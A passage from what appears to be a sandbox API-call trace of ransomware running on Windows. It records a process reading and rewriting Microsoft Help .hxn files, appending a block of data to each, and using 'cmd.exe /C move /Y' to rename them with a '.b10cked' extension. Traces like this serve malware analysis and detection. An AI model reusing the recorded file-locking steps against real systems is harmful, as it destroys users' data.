dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: 
lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbb4, dwThreadId=0xcbc)) returned 1 [0197.292] CloseHandle (hObject=0x1b4) returned 1 [0197.292] CloseHandle (hObject=0x120) returned 1 [0197.292] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.292] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.292] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.292] ReleaseMutex (hMutex=0xf8) returned 1 [0197.292] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.excel.dev.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25408193390) returned 1 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.293] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] 
SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) 
returned 0x15e [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.294] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.294] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0197.295] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.295] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0197.295] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0197.296] ReadFile (in: hFile=0x120, lpBuffer=0x1300e58, nNumberOfBytesToRead=0xae, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesRead=0x12ec08*=0xae, lpOverlapped=0x0) returned 1 [0197.296] SetFilePointer (in: hFile=0x120, lDistanceToMove=-174, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xb0 [0197.296] WriteFile (in: hFile=0x120, lpBuffer=0x1300e58*, nNumberOfBytesToWrite=0xae, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1300e58*, lpNumberOfBytesWritten=0x12ec1c*=0xae, lpOverlapped=0x0) returned 1 [0197.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0197.300] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.EXCEL.DEV.14.1033.hxn", cchWideChar=24, lpMultiByteStr=0x132f75c, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.EXCEL.DEV.14.1033.hxn", lpUsedDefaultChar=0x0) returned 24 [0197.300] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x15e [0197.300] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.300] CloseHandle (hObject=0x120) returned 1 [0197.301] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.EXCEL.DEV.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN") returned 0x27 [0197.302] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.302] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y 
\"C:\\Users\\ALLUSE~1\\MICROS~2\\MSEXCE~2.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.EXCEL.DEV.14.1033.hxn.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0x6d8, dwThreadId=0xbcc)) returned 1 [0197.304] CloseHandle (hObject=0x1b4) returned 1 [0197.304] CloseHandle (hObject=0x120) returned 1 [0197.304] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.304] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft Help\\", cchLength=0x22 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\") returned 0x22 [0197.304] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount1=34, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT HELP\\", cchCount2=34) returned 2 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0197.304] ReleaseMutex (hMutex=0xf8) returned 1 [0197.304] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn" (normalized: "c:\\users\\all users\\microsoft help\\ms.graph.14.1033.hxn"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=25409414155) returned 1 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x146 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0197.305] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, 
dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.306] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x146 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x146 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x146 [0197.307] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0197.307] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.307] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.308] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0197.309] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.309] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.309] ReadFile (in: hFile=0x120, lpBuffer=0x12f4da8, nNumberOfBytesToRead=0xa2, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesRead=0x12ec08*=0xa2, lpOverlapped=0x0) returned 1 [0197.309] SetFilePointer (in: hFile=0x120, lDistanceToMove=-162, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0xa4 [0197.309] WriteFile (in: hFile=0x120, lpBuffer=0x12f4da8*, nNumberOfBytesToWrite=0xa2, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x12f4da8*, lpNumberOfBytesWritten=0x12ec1c*=0xa2, lpOverlapped=0x0) returned 1 [0197.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 
[0197.313] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MS.GRAPH.14.1033.hxn", cchWideChar=20, lpMultiByteStr=0x1328794, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MS.GRAPH.14.1033.hxn", lpUsedDefaultChar=0x0) returned 20 [0197.313] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x146 [0197.314] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0197.314] CloseHandle (hObject=0x120) returned 1 [0197.314] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\MS.GRAPH.14.1033.hxn", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN") returned 0x27 [0197.315] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft Help\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~2\\") returned 0x1b [0197.315] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~2\\MSGRAP~1.HXN\" \"C:\\Users\\ALLUSE~1\\MICROS~2\\MS.GRAPH.14.1033.hxn.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, 